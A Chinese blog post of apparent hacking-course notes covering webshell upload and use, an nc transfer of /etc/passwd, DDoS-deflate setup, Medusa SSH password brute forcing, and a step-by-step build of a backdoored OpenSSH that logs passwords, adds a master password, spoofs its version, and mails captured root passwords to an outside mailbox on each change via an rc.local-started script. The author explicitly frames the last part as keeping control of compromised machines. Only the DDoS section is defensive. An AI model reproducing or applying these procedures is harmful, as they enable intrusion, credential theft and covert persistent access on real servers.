WEBSHELL-防止DDOS-暴力破解-自动劫持密码

webshell-防止DDOS-暴力破解-自动劫持密码

1  webshell使用方法

2  使用DDoS deflate 解决服务器被DDOS攻击的问题

23.1  webshell使用方法

23.1.1  攻击思路

想要拿下一台主机A的权限:

 1、了解一下这个服务器:端口,服务器版本,操作系统版本。找漏洞。

2、拿到对A有一定权限的身份。如果对方是一个WEB服务器,想办法上传webshell然后提权(利用对方的应用程序的漏洞)

3、传上去后,得到apache身份,提权           

23.1.2  webshell使用方法

上传木马程序:

方法1:nginx解析漏洞。  把aa.php 改成 aa.jpg  ,通过网站中的上传图片功能上传到服务器。可以直接执行php程序。

详情:CVE-2013-4547 Nginx解析漏洞深入利用及分析 :http://drops.wooyun.org/tips/2006

 

方法2:把webshell通过base64编码加密后,注入数据库。使用时,解密后,再执行。

 

实验环境:搭建一个LAMP环境。  上传webshell2.php到服务器上

[root@k63 ~]# yum -y install httpd mariadb-server mariadb php php-mysql

[root@k63 ~]# cp webshell2.php  /var/www/html/

[root@k63 ~]# systemctl start httpd

[root@k63 ~]# systemctl start mariadb

[root@k63 ~]# mysqladmin -u root password  "123456"

测试:

http://192.168.1.63/webshell2.php

 

密码:xuegod

 

登录以后能够看到web service的网站根目录的文件,也可以指定某个目录,但是需要该目录具体读的权限

 

也可以下载这些文件

 

打开MySQL管理器,可以登录到数据库,选项数据库,可以看到数据库中的数据

 

下载数据库中的表

 

执行数据库语句

 

执行一些简单的命令

 

查看在/tmp目录下创建的文件

 

回到主机中的/tmp目录查看刚刚所创建的文件,是以kill用户身份创建的,这里kill用户是php启动用户

 

PHP变量相关,默认可以查看到PHP一些变量,类似于phpinfo,也可以在文本框中输入PHP变量

 

执行PHP代码

<?php

   phpinfo();

?>

 

输入PHP代码的执行结果

 

 

返回连接,相当一个客户去连接另外一台主机,指定IP,端口则可以开启连接其他主机

 

 

扩展nc命令:

使用nc创建一个黑客监听服务器端口,随时客户端上传的数据

[root@k63 ~]# nc -l 9999 < /etc/passwd

[root@k63 ~]# netstat -antup | grep 9999

tcp        0      0 0.0.0.0:9999                0.0.0.0:*                   LISTEN      55067/nc

登录xuegod64接收数据:

[root@xuegod64 ~]# nc 192.168.1.63 9999 > a.txt

[root@xuegod64 ~]# vim a.txt

注: 木马程序: server在被黑的机器上。  客户端在黑客的本地。

23.2  实战:使用DDoS deflate 解决服务器被DDOS攻击的问题

23.2.1  如何查是否受到了DDOS攻击

DDOS概述:分布式拒绝服务(DDoS:Distributed Denial of Service)攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力。

1、编写查看DDOS攻击的脚本内容

 [root@k63 ~]# vim  ddos-test.sh   #写入以下内容

#!/bin/bash

netstat -ntu | awk '{print $5}' | cut -d: -f4 | sort | uniq -c | sort -n

[root@k63 ~]# chmod +x ddos-test.sh

注释:

#!/bin/bash

netstat -ntu | awk '{print $5}' | cut -d: -f1             | sort |   uniq -c     | sort -n

  截取外网IP和端口     截取外网的IP以:为分隔符  |排序 | 排除相同的记录  | 排序并统计

 

注:这个脚本在不同的机器上执行时,因为  print $5 取得的结果不一样,所以需要根据实际情况,改变cut -d: -f1 中fn的值。 如果-f1 不行,就使用f4

cut -d: -f1   #以冒号为分隔符,取第一列的值。

 

2、模拟DDOS攻击

[root@k63 ~]#  ab -n 100 -c 10 http://192.168.1.63/index.html  #开始攻击

[root@k63 ~]# ./ddos-test.sh  #查看已经建立的网络连接数

      1 42.99.254.162

      1 Address

      1 servers)

      2 192.168.1.106

      2 192.168.1.23

102 192.168.1.63

 

23.2.2  实战:使用DDoS deflate 解决服务器被DDOS攻击的问题

1、防止DDOS攻击的方法

方法一: 手动写iptables 规则,ip地址数比较少时

方法二: 检测到访问次数比较多的ip地址后,自动添加iptables规则。如fail2ban或linux+DDoS deflate

2、DDoS deflate介绍

DDoS deflate是一款免费的用来防御和减轻DDoS攻击的脚本。它通过netstat监测跟踪创建大量网络连接的IP地址,在检测到某个结点超过预设的限制时,该程序会通过APF或IPTABLES禁止或阻挡这些IP。

方法三:加大带宽,增加服务器,使用CDN技术

3、检测是否有DDOS攻击

执行:

[root@k63 ~]# netstat -ntu | awk '{print $5}' | cut -d: -f4 | sort | uniq -c | sort -n

如果发现某个IP连接数据上百的链接,说明就有DDOS攻击。

 

下面开始安装DDos deflate

4、安装DDoS deflate

[root@k63 ~]# wget http://www.inetbase.com/scripts/ddos/install.sh  

下载DDoS  deflate,保证可以上网

[root@k63 ~]# chmod 700 install.sh    #添加权限

[root@k63 ~]#./install.sh             #执行

Installing DOS-Deflate 0.6

Downloading source files.........done

Creating cron to run script every minute.....(Default setting).....done

Installation has completed.

Config file is at /usr/local/ddos/ddos.conf

Please send in your comments and/or suggestions to zaf@vsnl.com

###################################################

###############################################

#                       "Artistic License"                                   #

#                                                                            #

#                           Preamble                                         #

#                                                                            #

# The intent of this document is to state the conditions under which a       #

# Package may be copied, such that the Copyright Holder maintains some       #

q 输入q 退出。

5、查看安装后的配置文件

DDoS deflate的默认配置位于/usr/local/ddos/ddos.conf ,内容如下:

[root@k63 ~]# vim /usr/local/ddos/ddos.conf

##### Paths of the script and other files

PROGDIR="/usr/local/ddos"

PROG="/usr/local/ddos/ddos.sh"  #要执行的DDOS脚本

IGNORE_IP_LIST="/usr/local/ddos/ignore.ip.list"  #IP地址白名单,注:在这个文件中IP不受控制。

CRON="/etc/cron.d/ddos.cron"    #定时执行程序

 

6、查看定时任务

[root@k63 ~]# cat  /etc/cron.d/ddos.cron

SHELL=/bin/sh

0-59/1 * * * * root /usr/local/ddos/ddos.sh >/dev/null 2>&1

 

23.2.3  使用DDos deflate

实战场景: 如果1分钟内,一个IP地址对我们服务器访问150次以上,就认为发生DDOS,使用iptables把这个IP地址自动屏蔽掉。

1、修改配置文件

[root@k63 ~]# vim /usr/local/ddos/ddos.conf

配置文件中的注释如下:

##### frequency in minutes for running the script

##### Caution: Every time this setting is changed, run the script with --cron

#####          option so that the new frequency takes effect

FREQ=1   #检查时间间隔,默认1分钟

 

##### How many connections define a bad IP? Indicate that below.

NO_OF_CONNECTIONS=150     #最大连接数,超过这个数IP就会被屏蔽,一般默认即可

 

##### APF_BAN=1 (Make sure your APF version is atleast 0.96)

##### APF_BAN=0 (Uses iptables for banning ips instead of APF)

APF_BAN=1        #使用APF还是iptables。推荐使用iptables,将APF_BAN的值改为0即可。

改:19 APF_BAN=1

为:19 APF_BAN=0

##### KILL=0 (Bad IPs are'nt banned, good for interactive execution of script)

##### KILL=1 (Recommended setting)

KILL=1   #是否屏蔽IP,默认即可

 

##### An email is sent to the following address when an IP is banned.

##### Blank would suppress sending of mails

EMAIL_TO=kill@xuegod.com   #当IP被屏蔽时给指定邮箱发送邮件报警,换成自己的邮箱即可

 

##### Number of seconds the banned ip should remain in blacklist.

BAN_PERIOD=600    #禁用IP时间,默认600秒,可根据情况调整

用户可根据给默认配置文件加上的注释提示内容,修改配置文件。

注:安装后,不需要手动运行任何软件,因为有crontab计划任务,每过一分钟,会行自动执行一次。检查是否有不正常的访问量

 

2、 在xuegod64上模拟DDOS

[root@xuegod64 ~]# ab -n 1000 -c 10 http://192.168.1.63/index.html

等待一分钟后,在xudgod63查看结果,多了一条规则

[root@k63 ~]# iptables -L -n          #可以看到已经把192.168.1.64给拒绝了。

Chain INPUT (policy ACCEPT)

target     prot  opt  source               destination        

DROP       all   --   192.168.1.64         0.0.0.0/0          

 

3、卸载软件

卸载软件的本质: 删除软件安装后的文件

安装软件的本质:把你写的软件文件,复制对应的目录下

[root@k63 ~]# wget http://www.inetbase.com/scripts/ddos/uninstall.ddos

[root@k63 ~]# chmod +x uninstall.ddos

[root@k63 ~]# ./uninstall.ddos

 

23.3  使用Medusa美杜莎暴力破解SSH密码

1、Medusa简介

Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具。

官方网站:http://foofus.net/goons/jmk/medusa/medusa.html。

软件下载地址:https://github.com/jmk-foofus/medusa/archive/2.2.tar.gz

 

2、安装medusa ,手动编译和安装medusa

[root@k63 ~]# yum install libssh2-devel libssh2-devel  -y

[root@k63 ~]# tar zxvf 2.2.tar.gz

[root@k63 ~]# cd medusa-2.2/

[root@k63 medusa-2.2]# ./configure   --enable-debug=yes --enable-module-afp=yes --enable-module-cvs=yes --enable-module-ftp=yes --enable-module-http=yes --enable-module-imap=yes --enable-module-mssql=yes --enable-module-mysql=yes --enable-module-ncp=yes --enable-module-nntp=yes --enable-module-pcanywhere=yes --enable-module-pop3=yes --enable-module-postgres=yes --enable-module-rexec=yes --enable-module-rlogin=yes --enable-module-rsh=yes --enable-module-smbnt=yes --enable-module-smtp=yes --enable-module-smtp-vrfy=yes --enable-module-snmp=yes --enable-module-ssh=yes --enable-module-svn=yes --enable-module-telnet=yes --enable-module-vmauthd=yes --enable-module-vnc=yes --enable-module-wrapper=yes --enable-module-web-form=yes

#这个参数中加入很多模块,这样方便后期使用。--enable-module-ssh=yes这个就是稍后要使用的暴力破解sshd服务的模块。

[root@k63 medusa-2.2]# make -j 4

[root@k63 medusa-2.2]# make install         #安装完成后,会将medusa的一些modules 文件复制到/usr/local/lib/medusa/modules文件夹。

[root@k63 ~]# ls /usr/local/lib/medusa/modules  #查看已经生成的模块

 

3、Medusa参数说明

Medusa [-hhost|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module[OPT]

-h [TEXT]      目标主机名称或者IP地址

-H [FILE]       包含目标主机名称或者IP地址文件

-u [TEXT]      测试的用户名

-U [FILE]       包含测试的用户名文件

-p [TEXT]      测试的密码

-P [FILE]       包含测试的密码文件

-C [FILE]       组合条目文件

-O [FILE]       日志信息文件

-e [n/s/ns]    n代表空密码,s代表为密码与用户名相同

-M [TEXT]      模块执行名称

-m [TEXT]      传递参数到模块

-d                 显示所有的模块名称

-n [NUM]       使用非默认Tcp端口

-s                 启用SSL

-r [NUM]       重试间隔时间,默认为3秒

-t [NUM]       设定线程数量

-T             同时测试的主机总数

-L                 并行化,每个用户使用一个线程

-f                 在任何主机上找到第一个账号/密码后,停止破解

-F                在任何主机上找到第一个有效的用户名/密码后停止审计。

-q                显示模块的使用信息

-v [NUM]      详细级别(0-6)

-w [NUM]     错误调试级别(0-10)

-V                显示版本

-Z [TEXT]      继续扫描上一次

 

4、破解单一服务器SSH密码

例1:通过文件来指定host和user,host.txt为目标主机名称或者IP地址,user.txt指定需要暴力破解的用户名,密码指定为123456。

[root@k63 medusa-2.2]# cd

[root@k63 ~]# echo 192.168.1.63 > /root/host.txt

[root@k63 ~]# echo root > /root/users.txt

[root@k63 ~]# medusa -M ssh -H ./host.txt -U ./users.txt -p 123456

 

注:可以看到暴解成功。

 

例2:对单一服务器进行密码字典暴力破解

[root@k63 ~]# vim /root/p.txt       #写入以下内容,每行一个密码,做一个临时字典 。

123

abc123

123456

666666

注:其中123456 是我们的密码

[root@k63 ~]# medusa -M ssh -H ./host.txt -U ./users.txt -P p.txt

  如图所示,破解成功后会显示success字样

 

例3:加-O  ssh.log 可以将成功破解的记录记录到ssh.log文件中

[root@k63 ~]# medusa -M ssh -H ./host.txt -U ./users.txt -P p.txt -O ./ssh.log

[root@k63 ~]# cat ssh.log

# Medusa v.2.2 (2018-10-19 22:03:27)

# medusa -M ssh -H ./host.txt -U ./users.txt -P p.txt -O ssh.log

ACCOUNT FOUND: [ssh] Host: 192.168.1.63 User: root Password: 123456 [SUCCESS]

# Medusa has finished (2018-10-19 22:03:30).

 

23.4  实战-自动劫持root密码并转发密码到邮箱

本节所使用实验环境:RHEL 6,在Centos7下无法实现

为什么要自动劫持root密码并转发密码到我的QQ邮箱 ?因为当你做黑客时,你的肉鸡密码被修改后,我们希望可以收到管理员修改的密码。

 

23.4.1  劫持root密码的过程

     实验拓扑图:

 

思路:在k63上安装一个打了后门补丁的sshd服务,当用户来连接时,直接把密码记录下来。然后使用脚本发给我们的邮箱中。

1、查看ssh版本

[root@k63 tmp]# ssh -v    #查看安装前ssh版本

OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010

 

2、确认gcc是否已安装

[root@k63 tmp]# gcc -v  #确认安装gcc

。。。

gcc version 4.4.6 20110731 (Red Hat 4.4.6-3) (GCC)

 

3、安装gcc

[root@k63 tmp]# yum install gcc  #如果没安装gcc,就安装一下

 

4、上传0x06-openssh-5.9p1.patch.tar.gz , openssh-5.9p1.tar.gz ,inotify-tools-3.13.tar.gz 到linux 的/tmp目录

 

5、进入文件目录

[root@k63 tmp]# cd /tmp

解压文件

[root@k63 tmp]# tar zxvf openssh-5.9p1.tar.gz

[root@k63 tmp]# tar -zxvf 0x06-openssh-5.9p1.patch.tar.gz

23.4.2  对openssh-5.9p1打后门漏洞补丁

1、开始打补丁

[root@k63 tmp]# cp openssh-5.9p1.patch/sshbd5.9p1.diff  openssh-5.9p1/

[root@k63 tmp]# cd openssh-5.9p1

[root@k63 openssh-5.9p1]# patch < sshbd5.9p1.diff   #打补就修改或者替换原来的文件

patching file auth.c   #认证

patching file auth-pam.c  #认证

patching file auth-passwd.c  #认证

patching file canohost.c

patching file includes.h  

patching file log.c

patching file servconf.c     #关于sshd服务端

patching file sshconnect2.c   #关于sshd连接

patching file sshlogin.c  #关于登录,把root密码记录下来

patching file version.h   #关于版本

 

2、修改后门密码和记录root密码的文件夹目录

[root@k63 openssh-5.9p1]# vim /tmp/openssh-5.9p1/includes.h

找到:

改:

177  #define ILOG "/tmp/ilog"       #记录登录到本机的用户名和密码

178  #define OLOG "/tmp/olog"     #记录从本机登录到其他服务器上的用户名和密码

179  #define SECRETPW "apaajaboleh"    #你后门密码

 

为:

177  #define ILOG "/usr/share/ifile"

178  #define OLOG "/usr/share/ofile"

179  #define SECRETPW "xuegod"

 

安装后的sshd服务的版本号为:

[root@k63 ~]# ssh -v

OpenSSH_5.8p1 Debian-1ubuntu3p1, OpenSSL 1.0.0-fips 29 Mar 2010

 

原来系统的版本:

[root@k63 ~]# ssh -v

OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010

 

3、为了使用安后的版本和原系统的版本一样,修改版本号:

[root@k63 openssh-5.9p1]# vim /tmp/openssh-5.9p1/version.h

改:

  3 #define SSH_VERSION     "OpenSSH_5.8p1 Debian-1ubuntu3"

  4

  5 #define SSH_PORTABLE    "p1"

为:

3 #define SSH_VERSION     " OpenSSH_5.3"

4

5 #define SSH_PORTABLE    "p1"

 

4、安装打了后门补丁的sshd服务

[root@k63 tmp]# yum install -y openssl openssl-devel pam-devel zlib zlib-devel

开始安装:

[root@k63 openssh-5.9p1]# ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5   

参数说明:

--prefix=/usr  #指定安装到/usr 目录下

--sysconfdir=/etc/ssh  #指定sshd服务配置文件目录

--with-pam  #支持pam认证

--with-kerberos5  #支持kerberos认证

 

[root@k63 openssh-5.9p1]# make -j 4 && make install

。。。

/usr/bin/install -c -m 0755 -s ssh /usr/bin/ssh   

/usr/bin/install -c -m 0755 -s scp /usr/bin/scp

/usr/bin/install -c -m 0755 -s ssh-add /usr/bin/ssh-add

/usr/bin/install -c -m 0755 -s ssh-agent /usr/bin/ssh-agent

/usr/bin/install -c -m 0755 -s ssh-keygen /usr/bin/ssh-keygen

/usr/bin/install -c -m 0755 -s ssh-keyscan /usr/bin/ssh-keyscan

/usr/bin/install -c -m 0755 -s sshd /usr/sbin/sshd

/usr/bin/install -c -m 4711 -s ssh-keysign /usr/libexec/ssh-keysign

/usr/bin/install -c -m 0755 -s ssh-pkcs11-helper /usr/libexec/ssh-pkcs11-helper

/usr/bin/install -c -m 0755 -s sftp /usr/bin/sftp

 

扩展: 通过rpm -Vf 检查命令是否被替换

[root@k63 openssh-5.9p1]# rpm -Vf /usr/bin/scp

S.5....T.    /usr/bin/scp

S.5....T.    /usr/bin/sftp

S.5....T.    /usr/bin/ssh

S.5....T.    /usr/bin/ssh-add

SM5...GT.    /usr/bin/ssh-agent

S.5....T.    /usr/bin/ssh-keyscan

可以看到很多ssh协议相关的命令,都被我们安装的sshd服务相关的命令替换了。这是黑客经常做的事情。

 

5、重启sshd服务:

[root@k63 openssh-5.9p1]# service sshd restart

6、、测试劫持密码

测试前,发现/usr/share/ifile文件没有存在

[root@k63 ~]# ls /usr/share/ifile

ls: cannot access /usr/share/ifile: No such file or directory

 

7、使用xshell登录k63,模拟远程登录

 

8、查看劫持到root密码

[root@k63 ~]# cat /usr/share/ifile

user:password --> root:123456

 

9、另外我们也可以使用后门密码来登录root帐号

[root@k63 openssh-5.9p1]# ssh root@192.168.1.63  输入密码:xuegod

查看:

[root@k63 ~]# cat /usr/share/ofile

user:password@host --> root:xuegod@192.168.1.63

 

23.4.3  测试记录远程主机的密码

1、使用k63登录远程主机xuegod64

[root@k63 ~]# ssh root@192.168.1.64

root@192.168.1.64's password:123456

Last login: Wed Aug 12 19:29:28 2015 from 192.168.1.63

[root@xuegod64 ~]# exit

[root@k63 ~]# cat /usr/share/ofile   #查看记录从xuegod64登录到远程主机的密码

user:password@host --> root:123456@192.168.1.63

user:password@host --> root:123456@192.168.1.64

 

23.4.5  自动发送邮件

这里以163的smtp服务器为例,实现自动发送邮件有以下两种方法:

方法1:通过sendmail或postfix给自己发邮件。 缺点: 需要开服务

方法2:LINUX下通过外部SMTP服务器发邮件,就像在Linux安装一个foxmail。

1、使用mail.rc实现发邮件

[root@k63 ~]# vim /etc/mail.rc  #在此文件中间,随机找个位置插入以下内容:

set from=helloworld14@163.com smtp=smtp.163.com 

set smtp-auth-user=helloworld14 smtp-auth-password=PASSWORD smtp-auth=login

注:

set from=helloworld14@163.com  #指定发件人的邮箱,这里我们就写成和收件人的邮箱一样。

set smtp-auth-user=helloworld14  #写自己发件人的邮箱帐号

smtp-auth-password=PASSWORD   #写自己发件人的邮箱密码

2、配置163邮箱,开启pop3/smtp服务

登录mail.163.com网站

点:设置->POP3/SMTP/IMAP->开启pop3服务(勾选开启pop3服务后,smtp也会自动开启)

 

 

 

 

点击开启POP3/SMTP/IMAP服务

勾选POP3/SMTP服务,随后弹出提醒相关信息,点击确定

 

勾选开启,随后需要设置客户端授权,需要手机以短信形式获取验证码,获取验证后,输入验证码并点击确定

 

 

设置授权密码,此密码用于第三方邮件客户端使用,既在linux主机实验中发送邮件也是使用该密码

 

设置第三方邮件客户端密码完成后,随后出现设置授权提示,点击确定即可完成设置

 

3、测试邮件发送

[root@k63 ~]# mail -s "demo title" helloworld14@163.com <  /usr/share/ifile

查看:

 

 

4、编写shell脚本自动发邮件,邮件的主题是服务器的IP地址

[root@k63 bin]# vim  /bin/zipmail  #写入以下内容

#!/bin/bash

ip=`ifconfig |grep inet| sed -n '1p'|awk '{print $2}'|awk -F ':' '{print $2}'`

mail -s $ip helloworld14@163.com < /usr/share/ifile

[root@k63 bin]# chmod +x /bin/zipmail

 

5、测试

[root@k63 bin]# zipmail

发现也可以收到邮件,说明成功。

 

23.4.6  实现当用户修改密码后,自动发邮件

1、安装inotify

[root@k63 ~]# cd /tmp/

[root@k63 tmp]# tar -zxvf inotify-tools-3.13.tar.gz

[root@k63 tmp]# cd inotify-tools-3.13

[root@k63 inotify-tools-3.13]# ./configure         #检查安装环境

[root@k63 inotify-tools-3.13]# make -j 4   #make编译,将源代码编译成二进制,可执行的文件   # -j  4 使用4个CPU一起编译。

[root@k63 inotify-tools-3.13]# make  install      #安装。

 

2、编写触发式自动发邮件脚本

[root@k63 ~]# vim /bin/zipmail

#!/bin/bash

/usr/local/bin/inotifywait -mrq -e create,move,delete,modify /usr/share/ifile |while read a b c

do

ip=`ifconfig |grep inet| sed -n '1p'|awk '{print $2}'|awk -F ':' '{print $2}'`

mail -s $ip helloworld14@163.com < /usr/share/ifile

done

 

4、设置开机启动zipmail脚本

[root@k63 ~]# vim /etc/rc.local    #在此文件的最后插入以下内容。

/bin/zipmail &

 

5、测试

[root@k63 ~]# bash  /etc/rc.local  #可以运行

 

6、排查:

方法1:

[root@k63 ~]# ps -axu | grep inoti   #查看进程是否运行

Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.8/FAQ

root     25112  0.0  0.0   6284   524 pts/1    S    17:40   0:00 /usr/local/bin/inotifywait -mrq -e create,move,delete,modify /tmp/ilog

root     25176  0.0  0.0   6284   528 pts/2    S    17:43   0:00

 

方法2:

[root@k63 ~]# rpm -Vf /usr/bin/ssh  #查看命令是否被黑客替换

S.5....T.    /usr/bin/scp

S.5....T.    /usr/bin/sftp

S.5....T.    /usr/bin/ssh

S.5....T.    /usr/bin/ssh-add

SM5...GT.    /usr/bin/ssh-agent

S.5....T.    /usr/bin/ssh-keyscan

 

总结:

 23.1  webshell使用方法

 23.2  使用DDoS deflate 解决服务器被DDOS攻击的问题

 23.3  使用Medusa美杜莎暴力破解SSH密码

 23.4  自动劫持root密码并转发密码到邮箱

 

posted @ 2019-09-18 13:49  科子  阅读(1088)  评论(0编辑  收藏  举报